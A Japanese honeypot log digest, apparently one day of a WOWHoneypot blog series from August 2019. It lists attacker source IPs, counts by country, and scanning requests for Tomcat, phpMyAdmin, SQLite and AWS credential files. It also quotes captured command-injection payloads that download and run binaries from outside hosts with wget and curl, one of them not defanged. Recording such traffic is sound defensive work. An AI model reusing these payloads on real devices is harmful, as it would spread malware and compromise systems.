WOWHoneypot観察(147日目)
2019/08/10(土)
トータルは2062件でした。
ハンティングログは以下です。
211.193.211[.]96 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang.mpsl |
192.34.128[.]70 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang.mpsl |
165.22.51[.]24 wget hxxp[:]//23.254.204[.]46/cool; curl -O hxxp[:]//185.164.72[.]155/cool |
165.22.51[.]24 curl -O hxxp[:]//185.164.72[.]155/cool |
IPのロケーション別の件数は以下です。
イタリア | 1825 |
トルコ | 177 |
アメリカ | 19 |
ブラジル | 8 |
中国 | 6 |
インド | 4 |
チェコ | 2 |
ドイツ | 2 |
フランス | 2 |
アルゼンチン | 2 |
ルーマニア | 1 |
ロシア | 1 |
ハンガリー | 1 |
イギリス | 1 |
ギリシャ | 1 |
イラン | 1 |
アゼルバイジャン | 1 |
エストニア | 1 |
韓国 | 1 |
エクアドル | 1 |
グルジア | 1 |
ポーランド | 1 |
タンザニア | 1 |
マラウイ | 1 |
オランダ | 1 |
件数 | 概要 | リクエスト |
---|---|---|
1827 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
50 | アクセス | GET / |
4 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.3/ |
4 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.2-rc1/ |
4 | phpMyAdminの調査 | GET /admin/ |
2 | Linksys ルータの E シリーズの脆弱性を狙った通信 | POST /tmUnblock.cgi |
2 | 調査 | HEAD / |
2 | 不正中継の調査 | GET hxxp[:]//www[.]msftncsi[.]com/ncsi.txt |
2 | SQLiteの調査 | GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php |
2 | SQLiteの調査 | GET /sqlitemanager/main.php |
2 | SQLiteの調査 | GET /sqlite/main.php |
2 | SQLiteの調査 | GET /script |
2 | phpMyAdminの調査 | GET /pma/ |
2 | phpMyAdminの調査 | GET /phpmyadmin2/ |
2 | phpMyAdminの調査 | GET /phpmyadmin/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin2/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.0/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.0.3/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.0.2/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.0.1/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.0-rc2/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.0-rc1/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.0-beta1/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.7.0/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.7.0-rc1/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.7.0-pl2/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.7.0-pl1/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.7.0-beta1/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.4/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.4-rc1/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.4-pl4/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.4-pl3/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.4-pl2/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.4-pl1/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.3-rc1/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.3-pl1/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.2/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.2-pl1/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.2-beta1/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.1/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.1-rc2/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.1-rc1/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.1-pl3/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.1-pl2/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.1-pl1/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0-rc3/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0-rc2/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0-rc1/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0-pl3/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0-pl2/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0-pl1/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0-beta2/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0-beta1/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0-alpha2/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0-alpha/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.7/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.7-pl1/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.6/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.6-rc2/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.6-rc1/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.5/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.5-rc2/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.5-rc1/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.5-pl1/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.4/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.1/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.2.6/ |
2 | phpMyAdminの調査 | GET /phpMyAdmin-2.2.3/ |
2 | phpMyAdminの調査 | GET /php-my-admin/ |
2 | phpMyAdminの調査 | GET /openserver/phpmyadmin/ |
2 | phpMyAdminの調査 | GET /mysql/ |
2 | phpMyAdminの調査 | GET /myadmin/ |
2 | phpMyAdminの調査 | GET /main.php |
2 | phpMyAdminの調査 | GET /hudson/script |
2 | phpMyAdminの調査 | GET /dbadmin/ |
2 | SQLiteの調査 | GET /agSearch/SQlite/main.php |
2 | SQLiteの調査 | GET /SQlite/main.php |
2 | SQLiteの調査 | GET /SQLiteManager/main.php |
2 | SQLiteの調査 | GET /SQLiteManager-1.2.4/main.php |
2 | SQLiteの調査 | GET /SQLite/main.php |
2 | phpMyAdminの調査 | GET /PMA/ |
2 | D-Linkルータの調査 | GET /HNAP1/ |
2 | cfgファイルの調査 | GET /64167f0000000.cfg |
1 | Spring Data Commonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
1 | クローリング | HEAD /robots.txt |
1 | 不正中継の調査 | GET hxxp[:]//110.249.212[.]46/testget?q=23333&port=80 |
1 | EyeLockの脆弱性を狙った通信? | GET /scripts/rpc.php?action=updatetime×erver=%7C%7Ccd%20/tmp;%20wget%20hxxp[:]//23.254.204[.]46/cool;%20curl%20-O%20hxxp[:]//23.254.204[.]46/cool;%20chmod%20+x%20cool;%20./cool%20HTTP/1.1 |
1 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.2/ |
1 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.1/ |
1 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.1-rc1/ |
1 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.0.4/ |
1 | INCA IM-204の脆弱性を狙った通信 | GET /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang&cd%20/tmp;%20wget%20http://23.254.204.46/cool;%20curl%20-O%20http://185.164.72.155/cool;%20chmod%20+x%20cool;%20./cool |
1 | JBOSS管理コンソールの調査 | GET /admin-console/login.seam |
1 | AWS認証情報の調査 | GET /.aws/credentials |